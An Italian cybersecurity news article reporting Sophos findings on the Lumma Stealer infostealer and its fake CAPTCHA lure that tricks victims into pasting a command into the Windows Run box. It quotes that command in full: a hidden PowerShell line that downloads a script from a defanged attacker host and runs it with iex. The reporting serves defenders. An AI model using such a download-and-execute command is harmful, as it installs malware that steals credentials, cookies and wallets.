Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile

Lumma Stealer è un noto malware specializzato nel furto di informazioni, attivo sin dalla metà del 2022. Negli ultimi mesi ha mostrato un’evoluzione significativa nelle sue modalità operative, adottando nuove tattiche, tecniche e procedure. Questa minaccia è sempre più presente nei report relativi agli incidenti di sicurezza informatica: solo nell’ultimo anno, sono state registrate migliaia di compromissioni attribuite al malware.

Si ritiene che abbia origini nell’ambiente cybercriminale russo e venga attualmente distribuito come Malware-as-a-Service (MaaS). I suoi creatori offrono aggiornamenti frequenti e assistenza agli utenti tramite canali Telegram e una documentazione ospitata su Gitbook. L’obiettivo principale di Lumma Stealer è l’esfiltrazione di dati sensibili, come credenziali di accesso, token di sessione, wallet di criptovalute e informazioni personali raccolte dai dispositivi infetti.

Ciò che rende Lumma particolarmente pericoloso sono le sue sofisticate tecniche di distribuzione, che di recente si sono espanse fino a includere l’ingegneria sociale attraverso false domande CAPTCHA e ingannevoli richieste di download. Questi metodi sfruttano la fiducia degli utenti nei processi di verifica di sicurezza più noti , inducendo le vittime a eseguire comandi dannosi sui propri sistemi.

Christmas Sale -40% 𝗖𝗵𝗿𝗶𝘀𝘁𝗺𝗮𝘀 𝗦𝗮𝗹𝗲! Sconto del 𝟰𝟬% 𝘀𝘂𝗹 𝗽𝗿𝗲𝘇𝘇𝗼 𝗱𝗶 𝗰𝗼𝗽𝗲𝗿𝘁𝗶𝗻𝗮 del Corso "Dark Web & Cyber Threat Intelligence" in modalità E-Learning sulla nostra Academy!🚀 Fino al 𝟯𝟭 𝗱𝗶 𝗗𝗶𝗰𝗲𝗺𝗯𝗿𝗲, prezzi pazzi alla Red Hot Cyber Academy. 𝗧𝘂𝘁𝘁𝗶 𝗶 𝗰𝗼𝗿𝘀𝗶 𝘀𝗰𝗼𝗻𝘁𝗮𝘁𝗶 𝗱𝗲𝗹 𝟰𝟬% 𝘀𝘂𝗹 𝗽𝗿𝗲𝘇𝘇𝗼 𝗱𝗶 𝗰𝗼𝗽𝗲𝗿𝘁𝗶𝗻𝗮. Per beneficiare della promo sconto Christmas Sale, scrivici ad [email protected] o contattaci su Whatsapp al numero di telefono: 379 163 8765. Supporta Red Hot Cyber attraverso:  L'acquisto del fumetto sul Cybersecurity Awareness Ascoltando i nostri Podcast Seguendo RHC su WhatsApp Seguendo RHC su Telegram Scarica gratuitamente “Byte The Silence”, il fumetto sul Cyberbullismo di Red Hot Cyber Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì.

I ricercatori di Sophos hanno identificato diverse campagne Lumma Stealer durante l’autunno e l’inverno 2024-25, documentando come le tattiche del malware si sono evolute per eludere il rilevamento. “Le variazioni che abbiamo riscontrato nel comportamento di Lumma Stealer sono significative per i difensori”, ha osservato il team Sophos Managed Detection and Response nel suo report, sottolineando che queste tecniche di distribuzione potrebbero essere facilmente adattate ad altri malware oltre a Lumma Stealer.

Un’innovazione particolarmente preoccupante riguarda l’abuso di Windows PowerShell attraverso pagine di verifica CAPTCHA ingannevoli.

In questa catena di attacchi, alle vittime che visitano siti dannosi viene presentata una richiesta di verifica standard “Non sono un robot”, creando un falso senso di sicurezza e legittimità. Dopo aver cliccato sulla casella di verifica, gli utenti vengono reindirizzati a una seconda pagina che chiede loro di caricare il comando “Esegui” di Windows, quindi premere Ctrl+V seguito da Invio.

Questa azione apparentemente innocua in realtà incolla ed esegue un comando PowerShell nascosto che opera in una finestra nascosta:

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t

L’esecuzione di questo comando avvia un sofisticato processo di attacco multifase. Lo script recupera componenti malware aggiuntivi dai server di comando e controllo, scaricando, estraendo ed eseguendo il payload principale di Lumma Stealer. Una volta attivo, questo malware accede sistematicamente ai dati del browser, come evidenziato nella Figura 6, dove Autolt3.exe accede ai dati di accesso e ai cookie di Chrome.

Ciò che rende questo vettore di attacco particolarmente efficace è l’impiego della crittografia AES per nascondere i payload successivi. Il malware impiega sofisticate tecniche di offuscamento, tra cui l’impiego di vettori di inizializzazione e complesse routine di decrittazione, per eludere le tradizionali misure di sicurezza. Questa combinazione di ingegneria sociale e metodi tecnici avanzati rappresenta un’evoluzione significativa nelle capacità di Lumma Stealer.

Gli esperti di sicurezza raccomandano di implementare soluzioni di protezione degli endpoint robuste con funzionalità di analisi comportamentale, poiché il solo rilevamento basato sulle firme si rivela inadeguato contro queste minacce in continua evoluzione.

Seguici su Google News, LinkedIn, Facebook e Instagram per ricevere aggiornamenti quotidiani sulla sicurezza informatica. Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.

Redazione

La redazione di Red Hot Cyber è composta da professionisti del settore IT e della sicurezza informatica, affiancati da una rete di fonti qualificate che operano anche in forma riservata. Il team lavora quotidianamente nell’analisi, verifica e pubblicazione di notizie, approfondimenti e segnalazioni su cybersecurity, tecnologia e minacce digitali, con particolare attenzione all’accuratezza delle informazioni e alla tutela delle fonti. Le informazioni pubblicate derivano da attività di ricerca diretta, esperienza sul campo e contributi provenienti da contesti operativi nazionali e internazionali.